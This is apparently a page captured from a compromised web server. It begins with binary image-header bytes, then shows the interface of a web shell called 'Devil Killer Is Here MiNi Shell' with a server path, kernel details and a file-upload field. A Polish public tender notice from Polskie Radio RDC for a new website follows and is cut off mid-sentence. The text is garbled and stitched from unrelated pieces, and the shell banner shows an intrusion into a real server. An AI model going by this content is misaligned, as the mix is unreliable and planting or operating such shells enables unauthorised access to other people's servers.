JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210927/0019289303-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowe wykonanie serwisu internetowego dla Polskiego Radia – Regionalnej Rozgłośni w Warszawie „Radio dla Ciebie” S.A. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Polskie Radio - Regionalna Rozgłośnia w Warszawie &quot;Radio dla Ciebie&quot; SA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Polskie Radio RDC SA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010420881</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Myśliwiecka 3/5/7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-459</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariatprezesa@rdc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rdc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednoosobowa Spółka Skarbu Państwa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowe wykonanie serwisu internetowego dla Polskiego Radia – Regionalnej Rozgłośni w Warszawie „Radio dla Ciebie” S.A. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-06522203-1f60-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00192893</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00025009/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 zakup/modernizacja strony internetowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://rdc.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://rdc.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Z<br/>zastrzeżeniem postanowień zawartych w rozdziale XIV SWZ oraz w ust. 2 i w ust. 4 niniejszego<br/>rozdziału SWZ, komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie<br/>przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o<br/>świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344), tj:<br/>1.1 poprzez Platformę przetargową pod adresem:<br/>https://rdc.logintrade.net/ (zwanej dalej zamiennie Platformą przetargową), w wierszu oznaczonym<br/>tytułem oraz znakiem niniejszego postępowania<br/>1.2 pocztą elektroniczną na adres e-mail Zamawiającego: przetargi@rdc.pl oraz adresy e mail<br/>Wykonawców podane w formularzach ofertowych. Po otwarciu ofert kontakt przez adres e-mail będzie<br/>możliwy tylko poprzez adres (adresy) wskazany w formularzu ofertowym.<br/>1. Ofertę, pod rygorem nieważności, składa się w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. Wykonawca może złożyć tylko jedną ofertę.<br/>2. Treść oferty musi odpowiadać treści SWZ.<br/>3. Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany<br/>jest zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https://rdc.logintrade.net/rejestracja/instrukcje.html oraz zaakceptować regulamin korzystania z<br/>Platformy przetargowej dostępny pod adresem: https://rdc.logintrade.net/<br/>4. Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w<br/>ust. 1 niniejszego rozdziału SWZ.<br/>5. Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie<br/>internetowej Platformy przetargowej - pod adresem: https://rdc.logintrade.net/<br/>6. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj.<br/>Logintrade S.A., ul. Legnicka 57d, lokal B/J, 54-203 Wrocław, nr tel. +48 71 787 35 34, e-mail:<br/>helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz. 800 - 1600.<br/>7. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia<br/>oferty (w zależności od wyboru opcji z logowaniem lub bez logowania), zostały opisane w Instrukcjachużytkowników Platformy przetargowej.<br/>8. Ofertę należy sporządzić na formularzu oferty stanowiącej Załączniki nr 3 do SWZ. Ofertę należy<br/>złożyć pod rygorem nieważności w formie elektronicznej (w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym.<br/>9. Oferta wraz z załącznikami musi być złożona za pośrednictwem Platformy przetargowej.<br/>Zamawiający zaleca, aby oferta została utworzona w formacie .pdf oraz podpisana wewnętrznym<br/>podpisem elektronicznym. W przypadku zastosowania podpisu zewnętrznego należy pamiętać o<br/>obowiązku dołączenia do pliku stanowiącego ofertę także pliku podpisującego, który generuje się<br/>automatycznie podczas złożenia podpisu.<br/>10. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16<br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę<br/>przedsiębiorstwa, powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem<br/>„Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi jawną<br/>część należy ten plik zaszyfrować. Wykonawca zobowiązany jest, wraz z przekazaniem tych informacji<br/>wykazać spełnienie przesłanek określonych w art. 11 ust. 2 ustawy z dnia 16 kwietnia 1993 r. o<br/>zwalczaniu nieuczciwej konkurencji. Zaleca się, aby uzasadnienie zastrzeżenia informacji jako<br/>tajemnicy przedsiębiorstwa było sformułowane w sposób umożliwiający jego udostępnienie.<br/>Zastrzeżenie przez Wykonawcę tajemnicy przedsiębiorstwa bez uzasadnienia będzie traktowane przez<br/>Zamawiającego jako bezskuteczne ze względu na zaniechanie przez Wykonawcę podjęcia<br/>niezbędnych działań w celu zachowania poufności objętych klauzulą informacji.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem Pani/Pana danych osobowych jest Polskie Radio – Regionalna Rozgłośnia w Warszawie „Radio dla Ciebie” S.A. z siedzibą przy ul. Myśliwieckiej 3/5/7, 00-459 Warszawa. <br/>2.	Administrator powołał Inspektora Ochrony Danych Osobowych. We wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych, może się Pani/Pan z nami skontaktować w następujący sposób:<br/>a)	listownie na adres: ul. Myśliwiecka 3/5/7, 00-459 Warszawa<br/>b)	przez e-mail: rodo@rdc.pl <br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na: kompleksowe wykonanie serwisu internetowego dla Polskiego Radia – Regionalnej Rozgłośni w Warszawie „Radio dla Ciebie” S.A. znak sprawy: 5/RI/2021 prowadzonym w trybie podstawowym bez negocjacji. Przetwarzanie danych osobowych będzie możliwe również w celu wykonania zadania realizowanego w interesie publicznym (podstawa prawna art. 6 ust. 1 lit. e RODO), w celach archiwalnych wobec prawnie uzasadnionego interesu zabezpieczenia i przechowania danych osobowych na wypadek prawnej potrzeby wykazania faktów (podstawa prawna art. 6 ust. 1 lit. f RODO) oraz w celach ustalenia, dochodzenia lub obrony przed roszczeniami, które mogą powstać w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego (podstawa prawna art. 6 ust. 1 lit. f RODO). Ponadto w przypadku Wykonawcy, z którym zostanie zawarta umowa, podstawę przetwarzania danych stanowić będzie art. 6 ust. 1 lit. b RODO, ponieważ przetwarzanie będzie niezbędne do wykonania tej umowy.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp. Ponadto do Pani/Pana danych osobowych mogą mieć również dostęp podmioty przetwarzające dane osobowe w imieniu tj. Polskiego Radia – Regionalnej Rozgłośni w Warszawie „Radio dla Ciebie” S.A.tj. podmioty świadczące pomoc prawną, usługi informatyczne w tym upoważnieni pracownicy Logintrade S.A. we Wrocławiu, adres: 53-680 Wrocław, ul. Braniborska 2/10, wpisana do Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla Wrocławia-Fabrycznej VI Wydział Gospodarczy KRS, pod numerem 0000438056, NIP 8942953589, REGON 020811830, jako właściciela Platformy Zakupowej Logintrade, na której Polskie Radio S.A. prowadzi postępowania o udzielenie zamówień publicznych, LT Serwis sp. z o.o. w Warszawie; adres: 00-644 Warszawa, ul. Polna 48/11, wpisana do Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m. st. Warszawy w Warszawie, XII Wydział Gospodarczy KRS, pod numerem 0000311815, NIP 8992656072, REGON 020811361, jako operatora Platformy Zakupowej Logintrade oraz PZP24.pl. sp. z o. o. we Wrocławiu 53-680 Wrocław, ul. Braniborska 2/10, wpisana do Krajowego Rejestru Sądowego prowadzonego przez Sąd Rejonowy dla Wrocławia-Fabrycznej, VI Wydział Gospodarczy Krajowego Rejestru Sądowego, pod numerem KRS 0000505029, NIP 8971797896, REGON: 022393643, jako podmiot obsługujący Platformę Zakupową Logintrade w zakresie zamówień publicznych, oraz usługi kurierskie i pocztowe, archiwizacyjne i związane z niszczeniem dokumentów. Pani/Pana dane osobowe mogą być udostępnione również innym podmiotom, jeżeli obowiązek taki będzie wynikać z przepisów prawa;<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. W przypadku zawarcia umowy z Wykonawcą, jego dane osobowe będą przechowywane przez czas trwania tej umowy, do momentu wygaśnięcia roszczeń związanych z wykonaniem zobowiązań umownych, chyba że niezbędny będzie dłuższy okres przetwarzania w przypadkach nakazanych prawem; <br/>6. Obowiązek podania przez Panią/Pana danych osobowych (.....)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">nr sprawy: 5/RI/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest kompleksowe wykonanie serwisu internetowego dla Polskiego Radia - Regionalnej Rozgłośni w Warszawie „Radio dla Ciebie” S.A. w oparciu o makiety UX, indywidualny projekt graficzny (smartfon, tablet, desktop) oraz System Zarządzania Treścią (CMS) wraz z instalacją na serwerze wskazanym przez Zamawiającego według OPZ.<br/>Serwis internetowy ma mieć charakter informacyjnego serwisu internetowego na którym będą publikowane aktualności podzielone na kategorie tematyczne oraz lokalne, podcasty i utwory multimedialne. W ramach serwisu internetowego użytkownik będzie miał możliwość skorzystania z wielu jego funkcjonalności, m.in. oddać głos w ankiecie, zagłosować na swoje ulubione przeboje, śledzić trendy muzyczne oraz posłuchać audycji radiowych i podcastów.<br/>Serwis internetowy powinien być wykonany w oparciu o standardy projektowania UX/UI oraz wyróżniać się nowoczesnym, zgodnym z aktualnymi trendami projektem graficznym. Dodatkowo ma być zgodny ze standardami W3C oraz być dostosowany do potrzeb osób niepełnosprawnych według WCAG 2.1. Ma umożliwiać w prosty i intuicyjny sposób edycję oraz zarządzanie poszczególnymi elementami przez panel administracyjny (CMS) oraz być w pełni responsywny (RWD). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72413000-8 - Usługi w zakresie projektowania stron WWW</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Wykonawca określa cenę realizacji zamówienia poprzez wskazanie w Formularzu ofertowym sporządzonym wg wzoru stanowiącego Załącznik nr 3 do SWZ łącznej ceny ofertowej brutto za realizację całości przedmiotu zamówienia, zgodnie z tabelą w formularzu ofertowym wraz z należnym podatkiem VAT. Wyliczona cena oferty brutto będzie służyć do porównania złożonych ofert i do rozliczenia w trakcie realizacji zamówienia.<br/>2.	Łączna cena ofertowa brutto musi uwzględniać wszystkie koszty związane z realizacją przedmiotu zamówienia, zgodnie z OPZ oraz istotnymi postanowieniami umowy określonymi, stanowiącymi Załącznik nr 2 do SWZ.<br/>3.	Cena podana w Formularzu ofertowym jest ceną ostateczną, niepodlegająca negocjacji i wyczerpującą wszystkie należności Wykonawcy wobec Zamawiającego związane z realizacją przedmiotu zamówienia.<br/>4.	Cena oferty brutto za realizację całości przedmiotu zamówienia musi być: podana i wyliczona w zaokrągleniu do dwóch miejsc po przecinku (zasada zaokrąglenia – poniżej 5 należy końcówkę pominąć, powyżej i równe 5 należy zaokrąglić w górę).<br/>5.	Cena oferty brutto winna być wyrażona w złotych polskich (PLN). Zamawiający nie przewiduje rozliczeń w innych, obcych walutach.<br/>1.	Ocena punktowa w kryterium „Cena” zostanie dokonana na podstawie ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i będzie przeliczona według wzoru:<br/><br/>Cena najtańszej oferty<br/>C = ------------------------------ x 40<br/>Cena badanej oferty<br/><br/>Cena ta winna być wskazana w ofercie, którego wzór stanowi Załącznik nr 3 do SWZ. Maksymalna liczba punktów do uzyskania w tym kryterium wynosi 40,00.<br/>2.	Ocena punktowa w kryterium „Organizacja zespołu wskazanego do realizacji zamówienia” zostanie dokonana na podstawie dokumentu „Organizacja zespołu”, o którym mowa w rozdziale XIV pkt 12 ppkt 12.5 SWZ. <br/><br/>Zamawiający dokona oceny ofert opierając się na następujących zasadach:<br/>Oferowane<br/>podejście<br/>	Jak dobrze oferta wychodzi naprzeciw<br/>wymaganiom należytej realizacji zamówienia	Ocena<br/>Nieakceptowalne<br/>	Oferta nie uwzględnia lub w pełni nie uwzględnia<br/>wymagań SIWZ, nie pokazuje właściwego zaangażowania<br/>potencjału wykonawcy, nie gwarantuje wysokiej jakości<br/>prac lub nie odnosi się do wymagań wskazanych przez<br/>zamawiającego w tym kryterium<br/>	1–8<br/><br/>Akceptowalne<br/>	Zaoferowane zasoby i zasady pracy są adekwatne,<br/>zaoferowano standardowe rozwiązania w zakresie<br/>ciągłości, jakości i monitorowania prac. Wykonawca<br/>dostatecznie odnosi się do wymagań wskazanych przez<br/>zamawiającego w tym kryterium<br/>	10<br/>Dobre<br/>	Oferta pokazuje dobrze przemyślane zaangażowanie<br/>zasobów, spójne i skuteczne mechanizmy zapewnienia<br/>ciągłości, jakości oraz monitorowania prac. Wykonawca<br/>dobrze odnosi się do wymagań wskazanych przez<br/>zamawiającego w tym kryterium	11-14<br/>Bardzo Dobre<br/>	Oferta w sposób dobry uwzględnia wymagania<br/>zamawiającego, a ponadto obejmuje specyficzne dla<br/>projektu inicjatywy wynikające z doświadczenia personelu<br/>przewidzianego do realizacji zamówienia, zwiększające<br/>pewność należytego wykonania zamówienia<br/>	15-19<br/>Doskonałe<br/>	Oferta w sposób bardzo dobry uwzględnia wymagania<br/>zamawiającego, a ponadto obejmuje innowacyjne<br/>i specyficzne dla projektu inicjatywy wynikające<br/>z doświadczenia personelu przewidzianego do realizacji<br/>zamówienia, zwiększające pewność należytego wykonania<br/>zamówienia	20<br/>3.	Ocena punktowa w kryterium „Doświadczenie kierownika zespołu (minimum 5 lat)” zostanie dokonana na podstawie wskazanego przez Wykonawcę w ofercie doświadczenia kierownika określanego w latach i będzie przeliczona według wzoru D = okres doświadczenia kierownika rozpatrywanej oferty : najdłuższy okres doświadczenia kierownika rozpatrywanych ofert - określony w ofertach rozpatrywanych (minimum 5 lat) x 100 pkt x 10%. Doświadczenie kierownika zespołu winno być wskazane w ofercie, którego wzór stanowi Załącznik nr 3 do SWZ.<br/><br/> Maksymalna liczba punktów do uzyskania w tym kryterium wynosi 10,00.<br/>4.	Ocena punktowa w kryterium „Doświadczenie zespołu” zostanie dokonana dokonana na podstawie dokumentu „Wykaz ...(........)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Organizacja zespołu wskazanego do realizacji zamówienia”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Doświadczenie kierownika zespołu (minimum 5 lat)”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Doświadczenie zespołu”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>1.1	spełniają warunki udziału w postępowaniu określone przez Zamawiającego dotyczące:<br/>1.1.1	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie.<br/>1.1.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie.<br/>1.1.3	sytuacji ekonomicznej lub finansowej:<br/>1.1.3.1	Wykonawca 